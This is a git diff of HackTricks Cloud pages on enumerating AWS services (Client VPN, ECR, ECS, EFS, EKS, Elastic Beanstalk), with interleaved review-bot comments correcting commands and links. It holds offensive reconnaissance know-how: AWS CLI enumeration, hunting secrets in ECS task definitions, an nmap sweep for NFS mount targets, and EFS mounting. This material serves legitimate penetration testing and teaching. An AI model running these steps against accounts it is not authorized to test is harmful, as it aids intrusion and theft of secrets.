@@ -174,46 +162,34 @@ In addition, take the following into consideration when you use Site-to-Site VPN #### Concepts -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. 
-* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. +- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. +- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. 
Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. +- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. +- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. +- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. +- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. +- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. +- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. #### Limitations -* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. 
-* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -* Client VPN supports **IPv4** traffic only. -* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. +- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. +- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** +- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. +- The **client CIDR range cannot be changed** after you create the Client VPN endpoint. 
+- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. +- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. +- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. +- Client VPN supports **IPv4** traffic only. +- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. +- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. - ``` - SCRV1:: - ``` -* The self-service portal is **not available for clients that authenticate using mutual authentication**. + ``` + SCRV1:: + ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +- The self-service portal is **not available for clients that authenticate using mutual authentication**. -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md new file mode 100644 index 000000000..054b414b8 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md 
@@ -0,0 +1,102 @@
+# AWS - ECR Enum
+
+## AWS - ECR Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### ECR
+
+#### Basic Information
+
+Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
+
+ECR is compose by 2 types of objects: **Registries** and **Repositories**.
+
+**Registries**
+
+Every AWS account has 2 registries: **Private** & **Public**.
+
+1. **Private Registries**:
+
+- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
+ - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/`
+- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
+- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
+- **Other private registry options**:
+ - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
+ - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
+ - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
+ - Specific **IAM policies** can be configured to grant different **permissions**.
+ - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
+
+2. **Public Registries**:
+
+- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
+ - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember.
+
+**Repositories**
+
+These are the **images** that in the **private registry** or to the **public** one.
+
+> [!NOTE]
+> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
+
+#### Registry & Repository Policies
+
+**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
+
+
+#### Enumeration
+
+```bash
+# Get repos
+aws ecr describe-repositories
+aws ecr describe-registry
+
+# Get image metadata
+aws ecr list-images --repository-name
+aws ecr describe-images --repository-name
+aws ecr describe-image-replication-status --repository-name --image-id
+aws ecr describe-image-scan-findings --repository-name --image-id
+aws ecr describe-pull-through-cache-rules --repository-name --image-id
+
+# Get public repositories
+aws ecr-public describe-repositories
+
+# Get policies
+aws ecr get-registry-policy
+aws ecr get-repository-policy --repository-name
+```
+
+#### Unauthenticated Enum
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
+{{#endref}}
+
+#### Privesc
+
+In the following page you can check how to **abuse ECR permissions to escalate privileges**:
+
+{{#ref}}
+../aws-privilege-escalation/aws-ecr-privesc.md
+{{#endref}}
+
+#### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-ecr-post-exploitation.md
+{{#endref}}
+
+#### Persistence
+
+{{#ref}}
+../aws-persistence/aws-ecr-persistence.md
+{{#endref}}
+
+## References
+
+- [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
new file mode 100644
index 000000000..94aa75376
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
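Review bot: In the enumeration block, `aws ecr describe-pull-through-cache-rules --repository-name --image-id` passes flags that subcommand does not accept; it is registry-scoped and filters only with `--ecr-repository-prefixes` (and `--registry-id`), so the line should simply be `aws ecr describe-pull-through-cache-rules`. Two sentences in the prose are broken: `ECR is compose by 2 types of objects` should read `ECR is composed of 2 types of objects`, and the Repositories definition `These are the **images** that in the **private registry** or to the **public** one` should say something like `These hold the **images** and live either in the **private registry** or in the **public** one`. The file also carries its title twice (`# AWS - ECR Enum` followed by `## AWS - ECR Enum`) and nests everything under `###`/`####`, while the sibling ECS page added in this same commit uses `##`/`###`; dropping the duplicate heading and promoting the rest by one level would keep the two consistent.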
@@ -0,0 +1,82 @@
+# AWS - ECS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## ECS
+
+### Basic Information
+
+Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**.
+
+ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**.
+
+- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”.
+- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups.
+ - There **2 types of applications**:
+ - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application.
+ - **Task**: A standalone task that runs and terminates. For example, a batch job.
+ - Among the service applications, there are **2 types of service schedulers**:
+ - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node.
+ - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies.
+- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**...
+ - Check **env variables for sensitive info**!
+
+### Sensitive Data In Task Definitions
+
+Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
+
+Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
+
+### Enumeration
+
+```bash
+# Clusters info
+aws ecs list-clusters
+aws ecs describe-clusters --clusters
+
+# Container instances
+## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster.
+aws ecs list-container-instances --cluster +aws ecs describe-container-instances --cluster --container-instances + +# Services info +aws ecs list-services --cluster +aws ecs describe-services --cluster --services +aws ecs describe-task-sets --cluster --service + +# Task definitions +aws ecs list-task-definition-families +aws ecs list-task-definitions +aws ecs list-tasks --cluster +aws ecs describe-tasks --cluster --tasks +## Look for env vars and secrets used from the task definition +aws ecs describe-task-definition --task-definition : +``` + +### Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +{{#endref}} + +### Privesc + +In the following page you can check how to **abuse ECS permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-ecs-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-ecs-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-ecs-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md similarity index 51% rename from pentesting-cloud/aws-security/aws-services/aws-efs-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md index 75d6aad44..1a7079ae8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md @@ -1,19 +1,6 @@ # AWS - EFS Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
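Review bot: The comment `## Look for env vars and secrets used from the task definition` above `describe-task-definition` needs a caveat: the `secrets` entries of a container definition carry only a `valueFrom` ARN pointing at Secrets Manager or SSM Parameter Store, so the values are not in the task definition and reading them requires `secretsmanager:GetSecretValue` or `ssm:GetParameter` on that ARN, a permission normally held by the task execution role rather than by whoever is enumerating; plaintext appears only in `environment` (and in any S3 object referenced by `environmentFiles`). I would add `## "secrets" only hold Secrets Manager/SSM ARNs (valueFrom) - fetch them with secretsmanager get-secret-value / ssm get-parameter` under the existing comment. Minor wording in the same hunk: `There **2 types of applications**:` is missing its verb (`There are 2 types of applications:`), and `If for some reason a task shut down` should be `shuts down`.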
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EFS @@ -53,13 +40,11 @@ aws efs describe-replication-configurations sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure ``` -{% hint style="danger" %} -It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. -{% endhint %} +> [!CAUTION] +> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. ### Mount EFS -{% code overflow="wrap" %} ```bash sudo mkdir /efs @@ -73,7 +58,6 @@ sudo yum install amazon-efs-utils # If centos sudo apt-get install amazon-efs-utils # If ubuntu sudo mount -t efs :/ /efs/ ``` -{% endcode %} ### IAM Access @@ -82,30 +66,30 @@ For example, this File System policy **won't allow even to mount** the file syst ```json { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", - "Statement": [ - { - "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "", - "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } + "Version": "2012-10-17", + "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", + "Statement": [ + { + "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "", + "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", + "Condition": { + "Bool": { + "elasticfilesystem:AccessedViaMountTarget": "true" } - ] + } + } + ] } ``` Or this will **prevent anonymous access**: -
+
Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: 
@@ -130,45 +114,31 @@ sudo mount -t efs -o tls,[iam],accesspoint= \ /efs/ ``` -{% hint style="warning" %} -Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. -{% endhint %} +> [!WARNING] +> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. Access points can be used for the following purposes: -* **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. -* **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. -* **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. +- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. +- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. +- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. 
## Privesc -{% content-ref url="../aws-privilege-escalation/aws-efs-privesc.md" %} -[aws-efs-privesc.md](../aws-privilege-escalation/aws-efs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-efs-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-efs-post-exploitation.md" %} -[aws-efs-post-exploitation.md](../aws-post-exploitation/aws-efs-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-efs-post-exploitation.md +{{#endref}} ## Persistence -{% content-ref url="../aws-persistence/aws-efs-persistence.md" %} -[aws-efs-persistence.md](../aws-persistence/aws-efs-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-efs-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md new file mode 100644 index 000000000..3e34a3cd4 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md 
@@ -0,0 +1,46 @@
+# AWS - EKS Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## EKS
+
+Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS.
+
+Key aspects of Amazon EKS include:
+
+1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates.
+2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security.
+3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design.
+4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment.
+
+#### Enumeration
+
+```bash
+aws eks list-clusters
+aws eks describe-cluster --name
+# Check for endpointPublicAccess and publicAccessCidrs
+
+aws eks list-fargate-profiles --cluster-name
+aws eks describe-fargate-profile --cluster-name --fargate-profile-name
+
+aws eks list-identity-provider-configs --cluster-name
+aws eks describe-identity-provider-config --cluster-name --identity-provider-config
+
+aws eks list-nodegroups --cluster-name
+aws eks describe-nodegroup --cluster-name --nodegroup-name
+
+aws eks list-updates --name
+aws eks describe-update --name --update-id
+```
+
+#### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-eks-post-exploitation.md
+{{#endref}}
+
+## References
+
+- [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/)
+
+{{#include ../../../banners/hacktricks-training.md}}
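Review bot: The enumeration block stops at nodegroups, Fargate profiles and OIDC providers, so it misses the access-entries path that grants Kubernetes API access without touching the `aws-auth` ConfigMap: `describe-cluster` also returns `accessConfig.authenticationMode` (`CONFIG_MAP`, `API_AND_CONFIG_MAP` or `API`), and when an API mode is on, `aws eks list-access-entries --cluster-name <name>` together with `aws eks list-associated-access-policies --cluster-name <name> --principal-arn <arn>` show which principals hold cluster-wide policies such as `AmazonEKSClusterAdminPolicy`. `aws eks list-pod-identity-associations --cluster-name <name>` likewise lists the service-account-to-IAM-role mappings made through Pod Identity rather than IRSA. Both families need a reasonably recent CLI, which is worth stating next to the commands. The `# Check for endpointPublicAccess and publicAccessCidrs` comment is the right check (a public endpoint with `0.0.0.0/0` exposes the API server to the internet, authentication still applying); appending `and accessConfig.authenticationMode` to it would point readers at the fields above. Heading levels also jump from `## EKS` to `#### Enumeration` and back to `## References`, whereas the sibling ECS page in this commit uses `###`.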
diff --git a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md similarity index 57% rename from pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md index a2440c8d3..ddb803d1a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md @@ -1,19 +1,6 @@ # AWS - Elastic Beanstalk Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk @@ -23,15 +10,15 @@ Elastic Beanstalk provides a simple and flexible way to **deploy your applicatio The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: -{% content-ref url="aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} Moreover, if Docker is used, it’s possible to use **ECS**. -{% content-ref url="aws-eks-enum.md" %} -[aws-eks-enum.md](aws-eks-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-eks-enum.md +{{#endref}} ### Application & Environments 
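Review bot: The second `{{#ref}}` in this hunk still targets `aws-eks-enum.md`, yet the sentence introducing it says `if Docker is used, it's possible to use **ECS**`, and this same commit adds `aws-ecs-enum.md` next to it; the migration copied the old `content-ref` target over unchecked, so the reference should become `aws-ecs-enum.md` (Elastic Beanstalk's multicontainer Docker platform is backed by ECS, so the text is the part that is right). A reader following the link today lands on the wrong service page.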
@@ -39,15 +26,15 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" #### Application -* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. -* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. -* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. +- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. +- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. +- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. #### Environment -* An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. -* **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. -* When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) 
and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. +- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. +- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. +- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. ### 2 types of Environments 
@@ -58,15 +45,15 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" When creating an App in Beanstalk there are 3 very important security options to choose: -* **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app -* **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) - * The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). -* **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. 
- * This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
+- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app
+- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**)
